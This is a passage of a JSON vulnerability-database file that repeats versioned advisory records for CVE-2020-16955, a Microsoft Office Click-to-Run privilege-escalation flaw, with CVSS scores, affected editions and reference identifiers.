Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T12:46:29", "differentElements": ["msAffectedSoftware"], "edition": 72}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-20T14:58:21", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-20T14:58:21", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-20T14:58:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T14:58:21", "differentElements": ["msAffectedSoftware"], "edition": 73}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-21T08:56:51", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-20T14:58:21", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-20T14:58:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T08:56:51", "differentElements": ["msAffectedSoftware"], "edition": 74}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-21T10:46:19", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-21T10:46:19", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-21T10:46:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T10:46:19", "differentElements": ["msAffectedSoftware"], "edition": 75}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-25T23:08:14", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-21T10:46:19", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-21T10:46:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-25T23:08:14", "differentElements": ["msAffectedSoftware"], "edition": 76}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-26T00:45:50", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-21T10:46:19", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-21T10:46:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T00:45:50", "differentElements": ["msAffectedSoftware"], "edition": 77}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-26T08:45:55", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-26T08:45:55", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-26T08:45:55", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T08:45:55", "differentElements": ["msAffectedSoftware"], "edition": 78}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-26T20:46:04", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-26T08:45:55", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-26T08:45:55", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T20:46:04", "differentElements": ["msAffectedSoftware"], "edition": 79}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-28T08:52:55", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-26T08:45:55", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-26T08:45:55", "rev": 2}}, "objectVersion": 